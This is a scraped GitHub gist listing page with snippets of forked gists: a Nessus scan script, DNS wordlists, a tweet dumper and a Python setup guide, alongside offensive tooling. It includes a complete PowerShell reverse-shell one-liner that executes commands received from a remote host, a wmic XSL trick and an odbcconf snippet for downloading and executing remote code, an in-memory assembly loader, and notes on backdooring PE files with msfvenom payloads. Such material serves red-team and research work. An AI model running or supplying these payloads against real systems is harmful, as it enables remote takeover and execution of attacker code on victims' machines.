Skip to content

Instantly share code, notes, and snippets.

View PaulSec's full-sized avatar

Paul PaulSec

View GitHub Profile
@PaulSec
PaulSec / cloudscan.py
Created January 4, 2017 14:06 — forked from jgamblin/cloudscan.py
A python script to run Nessus cloud scans by @jgamblin but mostly stolen from @averagesecguy.
#!/usr/bin/env python
# Name: cloudscan.py
# Purpose: Run Nessus Cloud Scans Easily.
# By: Jerry Gamblin
# Date: 11.05.15
# Modified 11.05.15
# Rev Level 0.5
# -----------------------------------------------
import requests
@PaulSec
PaulSec / all.txt
Created July 16, 2017 15:33 — forked from jhaddix/all.txt
dnsall
This file has been truncated, but you can view the full file.
@
*
0
00
0-0
000
0000
00000
000000
@PaulSec
PaulSec / all.txt
Created July 16, 2017 15:33 — forked from jhaddix/all.txt
dnsall
This file has been truncated, but you can view the full file.
@
*
0
00
0-0
000
0000
00000
000000
@PaulSec
PaulSec / tweet_dumper.py
Created October 16, 2017 07:21 — forked from yanofsky/LICENSE
A script to download all of a user's tweets into a csv
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""
@PaulSec
PaulSec / powershell_reverse_shell.ps1
Created October 30, 2018 13:20 — forked from ThunderSon/powershell_reverse_shell.ps1
powershell reverse shell one-liner (no attribution)
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@PaulSec
PaulSec / msfvenom-reverse-tcp-WaitForSingleObject.md
Created December 29, 2018 11:45 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@PaulSec
PaulSec / python_environment_setup.md
Created February 6, 2019 15:43 — forked from wronk/python_environment_setup.md
Setting up your python development environment (with pyenv, virtualenv, and virtualenvwrapper)

Overview

When you're working on multiple coding projects, you might want a couple different version of Python and/or modules installed. That way you can keep each project in its own sandbox instead of trying to juggle multiple projects (each with different dependencies) on your system's version of Python. This intermediate guide covers one way to handle multiple Python versions and Python environments on your own (i.e., without a package manager like conda). See the Using the workflow section to view the end result.

Use cases

  1. Working on 2+ projects that each have their own dependencies; e.g., a Python 2.7 project and a Python 3.6 project, or developing a module that needs to work across multiple versions of Python. It's not reasonable to uninstall/reinstall modules every time you want to switch environments.
  2. If you want to execute code on the cloud, you can set up a Python environment that mirrors the relevant
@PaulSec
PaulSec / TestAssembly.cs
Created May 21, 2019 12:18 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@PaulSec
PaulSec / wmic.xsl
Created May 21, 2019 12:19 — forked from Arno0x/wmic.xsl
Oneliner for arbitrary code download and execution
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
@PaulSec
PaulSec / odbcconf.cs
Created May 21, 2019 12:19 — forked from Arno0x/odbcconf.cs
Download and execute arbitrary code with odbcconf.exe
/*
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/
using System;